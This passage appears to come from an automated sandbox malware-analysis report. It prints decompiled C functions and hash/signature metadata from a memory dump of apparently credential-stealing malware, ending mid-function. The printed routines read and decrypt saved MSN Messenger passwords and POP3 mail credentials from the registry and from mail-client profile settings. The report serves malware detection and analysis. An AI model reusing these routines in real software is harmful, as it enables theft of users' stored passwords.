                                                                                0x00000000
                                                                                0x00401afd
                                                                                0x00401afb
                                                                                0x00401b0c
                                                                                0x00401b20
                                                                                0x00401b26
                                                                                0x00401b48
                                                                                0x00401b48
                                                                                0x00401b28
                                                                                0x00000000
                                                                                0x00401b28
                                                                                0x00401b2a
                                                                                0x00401b3b
                                                                                0x00401b32
                                                                                0x00401b36
                                                                                0x00401b36
                                                                                0x00401b3f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b41
                                                                                0x00401b46
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b46
                                                                                0x00401b4b
                                                                                0x00401b4b
                                                                                0x00401b4f
                                                                                0x00401b82
                                                                                0x00401b93
                                                                                0x00401b9b
                                                                                0x00401b9c
                                                                                0x00401ba4
                                                                                0x00401ba4
                                                                                0x00401baa
                                                                                0x00401bbb
                                                                                0x00401bd1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401bbd
                                                                                0x00401bc0
                                                                                0x00000000
                                                                                0x00401bc2
                                                                                0x00401bc6
                                                                                0x00401bc6
                                                                                0x00000000
                                                                                0x00401bc0
                                                                                0x00401bac
                                                                                0x00401bb0
                                                                                0x00000000
                                                                                0x00401bb0
                                                                                0x00401b9e
                                                                                0x00401b9e
                                                                                0x00000000
                                                                                0x00401b9e
                                                                                0x00401b51
                                                                                0x00401b5c
                                                                                0x00401b63
                                                                                0x00401b67
                                                                                0x00401b68
                                                                                0x00401b72
                                                                                0x00401b6a
                                                                                0x00401b6a
                                                                                0x00401b6a
                                                                                0x00401b6a
                                                                                0x00000000
                                                                                0x00401b68
                                                                                0x00401b0e
                                                                                0x00401b16
                                                                                0x00401bd3
                                                                                0x00401bd7
                                                                                0x00401bdd
                                                                                0x00401bdd
                                                                                0x00401bdd
                                                                                0x00401be1
                                                                                0x00401be2
                                                                                0x00401aa4
                                                                                0x00401bf2
                                                                                0x00401bf6
                                                                                0x00401bf7
                                                                                0x00401bf9
                                                                                0x00401bf9
                                                                                0x00401c01
                                                                                0x00401c03
                                                                                0x00401c03
                                                                                0x00401c0b
                                                                                0x00401c0d
                                                                                0x00401c0d
                                                                                0x00401c16
                                                                                0x00401c18
                                                                                0x00401c18
                                                                                0x00401c21
                                                                                0x00401c23
                                                                                0x00401c23
                                                                                0x00401c2c
                                                                                0x00401c2e
                                                                                0x00401c2e
                                                                                0x00401c37
                                                                                0x00401c83
                                                                                0x00401c89
                                                                                0x00401c8e
                                                                                0x00401c8f
                                                                                0x00401c39
                                                                                0x00401c39
                                                                                0x00401c3d
                                                                                0x00401c3e
                                                                                0x00401c3f
                                                                                0x00401c42
                                                                                0x00401c47
                                                                                0x00401c51
                                                                                0x00401c54
                                                                                0x00401c5d
                                                                                0x00401c67
                                                                                0x00401c6b
                                                                                0x00401c6f
                                                                                0x00401c75
                                                                                0x00401c7a
                                                                                0x00401c7b
                                                                                0x00401c7b
                                                                                0x00401c96

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: free$strlen
                                                                                • String ID:
                                                                                • API String ID: 667451143-3916222277
                                                                                • Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                                • Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
                                                                                • Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                                • Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D4A6, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040D4A6(char* __ebx, void** _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				char* _v28;
				char _v32;
				char _v556;
				char _v557;
				char _v1578;
				void _v1580;
				void* __edi;
				void* __esi;
				long _t39;
				int _t43;
				char _t48;
				char* _t63;
				int* _t67;

				_t63 = __ebx;
				_t67 = 0;
				_v16 = 0;
				_v12 = 0x400;
				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
				if(_t39 != 0) {
					L13:
					RegCloseKey( *_a4);
					return _v16;
				}
				_t43 = _t39 + 1;
				if(_v12 <= _t43) {
					goto L13;
				}
				_t74 = _v1580 - 0x20;
				_v8 = 0;
				if(_v1580 >= 0x20) {
					_v8 = _t43;
					L10:
					if(_v8 != _t67) {
						_v557 = 0;
						E00401380( &_v1580,  &(_t63[0x100]), 0xff);
						_v8 = 0xff;
						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
						if(_t48 == 0) {
							_t63[0xfe] = _t48;
							_t63[0x1fe] = _t48;
							_v16 = 1;
						}
					}
					goto L13;
				}
				_t69 =  &_v556;
				E004046D7( &_v556);
				if(E004047A0(_t69, _t74) == 0) {
					L8:
					E004047F1( &_v556);
					_t67 = 0;
					goto L10;
				}
				_v32 = _v12 + 0xfffffffe;
				_v28 =  &_v1578;
				if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
					goto L8;
				}
				if(_v24 < 0x400) {
					memcpy( &_v1580, _v20, _v24);
					_v8 = 1;
				}
				LocalFree(_v20);
				goto L8;
			}





















                                                                                0x0040d4a6
                                                                                0x0040d4bf
                                                                                0x0040d4cf
                                                                                0x0040d4d2
                                                                                0x0040d4d5
                                                                                0x0040d4dd
                                                                                0x0040d5c7
                                                                                0x0040d5cc
                                                                                0x0040d5d8
                                                                                0x0040d5d8
                                                                                0x0040d4e3
                                                                                0x0040d4e7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d4ed
                                                                                0x0040d4f4
                                                                                0x0040d4f7
                                                                                0x0040d56d
                                                                                0x0040d570
                                                                                0x0040d573
                                                                                0x0040d587
                                                                                0x0040d58e
                                                                                0x0040d5a7
                                                                                0x0040d5aa
                                                                                0x0040d5b2
                                                                                0x0040d5b4
                                                                                0x0040d5ba
                                                                                0x0040d5c0
                                                                                0x0040d5c0
                                                                                0x0040d5b2
                                                                                0x00000000
                                                                                0x0040d573
                                                                                0x0040d4f9
                                                                                0x0040d4ff
                                                                                0x0040d50b
                                                                                0x0040d55e
                                                                                0x0040d564
                                                                                0x0040d569
                                                                                0x00000000
                                                                                0x0040d569
                                                                                0x0040d513
                                                                                0x0040d51c
                                                                                0x0040d532
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d537
                                                                                0x0040d546
                                                                                0x0040d54e
                                                                                0x0040d54e
                                                                                0x0040d558
                                                                                0x00000000

                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,73AFF420), ref: 0040D4D5
                                                                                • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA
                                                                                  • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                  • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                                  • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                • memcpy.MSVCRT ref: 0040D546
                                                                                • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040D5CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                                                • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                                • API String ID: 3289975857-105384665
                                                                                • Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                • Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
                                                                                • Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                • Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040706C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
				char _v12;
				short* _v16;
				char _v20;
				char* _v24;
				char _v28;
				char _v288;
				char _v544;
				char _v800;
				char _v1056;
				char _v1584;
				void _v2607;
				char _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t36;
				void* _t63;
				char* _t66;
				void* _t68;

				_t63 = __ecx;
				_v2608 = 0;
				memset( &_v2607, 0, 0x3ff);
				_v12 = 0x400;
				_v1056 = 0;
				_v800 = 0;
				_v544 = 0;
				_v288 = 0;
				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
				_t72 = _t36;
				if(_t36 != 0) {
					return _t36;
				}
				_t67 =  &_v1584;
				E004046D7( &_v1584);
				if(E004047A0( &_v1584, _t72) != 0) {
					_v24 =  &_v2608;
					_v28 = _v12;
					_t16 =  &_v20; // 0x407221
					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
						_t19 =  &_v20; // 0x407221
						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
						LocalFree(_v16);
						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
						_t28 =  &_a12; // 0x407221
						_t66 =  &_v1056;
						E004060D0(0xff, _t66,  *_t28);
						 *((intOrPtr*)( *_a4))(_t66);
					}
				}
				return E004047F1( &_v1584);
			}






















                                                                                0x0040706c
                                                                                0x00407087
                                                                                0x0040708d
                                                                                0x004070a5
                                                                                0x004070ac
                                                                                0x004070b2
                                                                                0x004070b8
                                                                                0x004070be
                                                                                0x004070c4
                                                                                0x004070cc
                                                                                0x004070ce
                                                                                0x00407199
                                                                                0x00407199
                                                                                0x004070d4
                                                                                0x004070da
                                                                                0x004070e6
                                                                                0x004070f2
                                                                                0x004070f8
                                                                                0x004070fb
                                                                                0x0040710d
                                                                                0x0040711d
                                                                                0x00407131
                                                                                0x00407138
                                                                                0x00407154
                                                                                0x0040716a
                                                                                0x0040716f
                                                                                0x00407172
                                                                                0x00407178
                                                                                0x00407188
                                                                                0x00407188
                                                                                0x0040710d
                                                                                0x00000000

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040708D
                                                                                  • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                  • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                  • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                                  • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,73AFED80,?), ref: 00407138
                                                                                  • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                  • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                  • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                                                • String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
                                                                                • API String ID: 604216836-250559020
                                                                                • Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                                • Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
                                                                                • Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                                • Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405E46, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52stringlibrarywindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00405E46(long __edi, char* _a4) {
				char _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t1 = _t24 - 0x834; // -2100
				_t8 = 0;
				_t14 = 0x1100;
				if(_t1 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = strcpy(_a4, "Unknown Error");
				} else {
					if(strlen(_v8) < 0x400) {
						strcpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                0x00405e46
                                                                                0x00405e4c
                                                                                0x00405e54
                                                                                0x00405e5c
                                                                                0x00405e61
                                                                                0x00405e6b
                                                                                0x00405e73
                                                                                0x00405e75
                                                                                0x00405e75
                                                                                0x00405e73
                                                                                0x00405e91
                                                                                0x00405ec0
                                                                                0x00405e93
                                                                                0x00405e9e
                                                                                0x00405ea6
                                                                                0x00405eac
                                                                                0x00405eb0
                                                                                0x00405eb0
                                                                                0x00405eca

                                                                                APIs
                                                                                • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
                                                                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
                                                                                • strlen.MSVCRT ref: 00405E96
                                                                                • strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
                                                                                • LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
                                                                                • strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                • API String ID: 3198317522-572158859
                                                                                • Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                                • Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
                                                                                • Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                                • Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040875C, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E0040875C(void* __eax, void* __eflags, signed int _a4, short _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t96;
				signed int _t98;
				void* _t99;
				signed int _t104;
				signed short _t107;
				signed int _t110;
				intOrPtr _t114;
				signed int _t117;
				signed int _t119;
				signed short _t121;
				signed int _t122;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t161;
				signed int _t163;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t178;
				intOrPtr _t180;

				_t174 = __eflags;
				_t172 = __eax;
				E00408572(__eax);
				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
				_t122 = 0xd;
				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
				_t156 = 0x14;
				_t96 = _t122 * _t156;
				 *(_t172 + 0x1b0) = _t122;
				_push( ~(0 | _t174 > 0x00000000) | _t96);
				L004115D0();
				 *(_t172 + 0x1b4) = _t96;
				_t158 = 0x10;
				_t98 = _t122 * _t158;
				_push( ~(0 | _t174 > 0x00000000) | _t98);
				L004115D0();
				 *(_t172 + 0x34) = _t98;
				_v8 = 0x4168e0;
				do {
					_t21 =  &_v8; // 0x4168e0
					_t99 =  *_t21;
					_t168 =  *_t99;
					_v12 = _t168;
					_t169 = _t168 * 0x14;
					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
					_t24 =  &_v8; // 0x4168e0
					_t104 = _v12 << 4;
					_v12 = _t104;
					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
					_t173 = _t173 + 0x18;
					_v16 = _t107;
					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
					if((_t107 & 0xffff0000) == 0) {
						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E004078FF(_t107 & 0x0000ffff);
						_t121 = E004078FF(_v16 | 0x00010000);
						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
						_t122 = 0xd;
					}
					_v8 = _v8 + 0x24;
					_t178 = _v8 - 0x416ab4;
				} while (_t178 < 0);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
				_t161 = 4;
				_t110 = _t122 * _t161;
				 *(_t172 + 0x20) = _t122;
				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
				_push( ~(0 | _t178 > 0x00000000) | _t110);
				L004115D0();
				_push(0xc);
				 *(_t172 + 0x24) = _t110;
				L004115D0();
				_t170 = _t110;
				if(_t170 == 0) {
					_t170 = 0;
					__eflags = 0;
				} else {
					_t114 =  *((intOrPtr*)(_t172 + 0x48));
					_t180 = _t114;
					_a8 = _t114;
					if(_t180 == 0) {
						_a8 = 0x64;
					}
					 *((intOrPtr*)(_t170 + 8)) = _a4;
					_t163 = 4;
					_t117 = _t122 * _t163;
					 *(_t170 + 4) = _t122;
					_push( ~(0 | _t180 > 0x00000000) | _t117);
					L004115D0();
					_a4 = _a4 & 0x00000000;
					 *_t170 = _t117;
					do {
						_t152 = _a4;
						_t119 = _t152 << 2;
						_a4 = _a4 + 1;
						 *( *_t170 + _t119 + 2) = _t152;
						 *((short*)(_t119 +  *_t170)) = _a8;
					} while (_a4 < _t122);
				}
				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
				 *(_t172 + 0x1a0) = _t170;
				 *((intOrPtr*)(_t172 + 0x40)) = 1;
				 *((intOrPtr*)(_t172 + 0x198)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
				return E004086DC(_t172);
			}

































                                                                                0x0040875c
                                                                                0x00408765
                                                                                0x00408767
                                                                                0x0040876f
                                                                                0x00408775
                                                                                0x00408776
                                                                                0x00408780
                                                                                0x00408783
                                                                                0x00408788
                                                                                0x00408792
                                                                                0x00408793
                                                                                0x00408798
                                                                                0x004087a2
                                                                                0x004087a5
                                                                                0x004087ae
                                                                                0x004087af
                                                                                0x004087b6
                                                                                0x004087b9
                                                                                0x004087c0
                                                                                0x004087c0
                                                                                0x004087c0
                                                                                0x004087c3
                                                                                0x004087c5
                                                                                0x004087c8
                                                                                0x004087d7
                                                                                0x004087dc
                                                                                0x004087eb
                                                                                0x004087f1
                                                                                0x004087f4
                                                                                0x004087ff
                                                                                0x00408809
                                                                                0x00408811
                                                                                0x00408814
                                                                                0x00408818
                                                                                0x00408831
                                                                                0x00408835
                                                                                0x00408842
                                                                                0x00408846
                                                                                0x00408846
                                                                                0x00408847
                                                                                0x0040884b
                                                                                0x0040884b
                                                                                0x0040885b
                                                                                0x0040885f
                                                                                0x00408866
                                                                                0x00408869
                                                                                0x0040886e
                                                                                0x00408871
                                                                                0x0040887c
                                                                                0x0040887d
                                                                                0x00408882
                                                                                0x00408884
                                                                                0x00408887
                                                                                0x0040888c
                                                                                0x00408892
                                                                                0x004088ee
                                                                                0x004088ee
                                                                                0x00408894
                                                                                0x00408894
                                                                                0x00408897
                                                                                0x00408899
                                                                                0x0040889c
                                                                                0x0040889e
                                                                                0x0040889e
                                                                                0x004088a8
                                                                                0x004088af
                                                                                0x004088b2
                                                                                0x004088b7
                                                                                0x004088be
                                                                                0x004088bf
                                                                                0x004088c4
                                                                                0x004088c9
                                                                                0x004088cb
                                                                                0x004088cb
                                                                                0x004088d2
                                                                                0x004088d5
                                                                                0x004088db
                                                                                0x004088e6
                                                                                0x004088e6
                                                                                0x004088ec
                                                                                0x004088f0
                                                                                0x004088fa
                                                                                0x00408902
                                                                                0x00408905
                                                                                0x0040890b
                                                                                0x00408911
                                                                                0x00408917
                                                                                0x0040892a

                                                                                APIs
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                  • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00408793
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004087AF
                                                                                • memcpy.MSVCRT ref: 004087D7
                                                                                • memcpy.MSVCRT ref: 004087F4
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040887D
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00408887
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004088BF
                                                                                  • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                  • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                  • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,73B74DE0), ref: 0040797A
                                                                                  • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                                                • String ID: d$hA
                                                                                • API String ID: 3781940870-4030989184
                                                                                • Opcode ID: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                                                • Instruction ID: 2ee817cab8fb9d662dc1fdc17dcda2a390100e1008d8253a008a3d74f0a2914d
                                                                                • Opcode Fuzzy Hash: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                                                • Instruction Fuzzy Hash: 76518D72A01704AFDB24DF2AC582B9AB7E5FF48354F10852EE54ADB391EB74E940CB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040314D, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v188;
				char _v268;
				char _v524;
				void* __ebx;
				void* __edi;
				char* _t53;
				void* _t60;
				void* _t65;
				char* _t70;

				_v8 = _v8 & 0x00000000;
				_t65 = __eax;
				 *((intOrPtr*)(__eax + 0x8c)) = 3;
				 *((intOrPtr*)(__eax + 0x210)) = 1;
				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
				if(_v524 == 0x31) {
					 *((intOrPtr*)(_t65 + 0x210)) = 2;
				}
				_v12 = _t65 + 0x110;
				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
				_t70 = _t65 + 0x214;
				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
				if(_v268 != 0) {
					_v188 = 0;
					E00401D5A( &_v268, _t65 + 0x294);
					if( *_t70 == 0) {
						_push(_a8);
						_t60 = 0x7f;
						_push(_t60);
						_push(_t70);
						_push("PopAccount");
						_push(_a4);
						E0040311F();
						if( *_t70 != 0) {
							_t53 = strchr(_t70, 0x40);
							_a8 = _t53;
							if(_t53 != 0) {
								E004060D0(_t60, _v12,  &(_t53[1]));
								 *_a8 = 0;
							}
						}
					}
					_v8 = 1;
				}
				if( *_t70 != 0) {
					_v8 = 1;
				}
				return _v8;
			}














                                                                                0x00403156
                                                                                0x00403160
                                                                                0x00403177
                                                                                0x00403181
                                                                                0x0040318b
                                                                                0x00403197
                                                                                0x00403199
                                                                                0x00403199
                                                                                0x004031b7
                                                                                0x004031ba
                                                                                0x004031c2
                                                                                0x004031d3
                                                                                0x004031e9
                                                                                0x00403202
                                                                                0x0040321a
                                                                                0x00403226
                                                                                0x00403234
                                                                                0x0040323b
                                                                                0x00403243
                                                                                0x00403245
                                                                                0x0040324a
                                                                                0x0040324b
                                                                                0x0040324c
                                                                                0x0040324d
                                                                                0x00403252
                                                                                0x00403255
                                                                                0x0040325d
                                                                                0x00403262
                                                                                0x0040326b
                                                                                0x0040326e
                                                                                0x00403275
                                                                                0x0040327e
                                                                                0x0040327e
                                                                                0x0040326e
                                                                                0x0040325d
                                                                                0x00403281
                                                                                0x00403281
                                                                                0x0040328e
                                                                                0x00403290
                                                                                0x00403290
                                                                                0x0040329b

                                                                                APIs
                                                                                  • Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143
                                                                                • strchr.MSVCRT ref: 00403262
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringstrchr
                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                • API String ID: 1348940319-1729847305
                                                                                • Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                • Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
                                                                                • Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                • Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F09D, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 16%
                                                                                			E0040F09D(char* __eax, void* __ecx) {
				void* _t2;
				char* _t3;
				void* _t5;
				void* _t6;
				void* _t7;

				_t3 = __eax;
				_t6 = __ecx;
				_t5 = 4;
				while(1) {
					_t2 =  *_t3;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t5);
					_push("&lt;");
					L14:
					_t2 = memcpy(_t6, ??, ??);
					_t7 = _t7 + 0xc;
					_t6 = _t6 + _t5;
					L16:
					if( *_t3 != 0) {
						_t3 = _t3 + 1;
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if(_t2 != 0xb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t6 = _t2;
										_t6 = _t6 + 1;
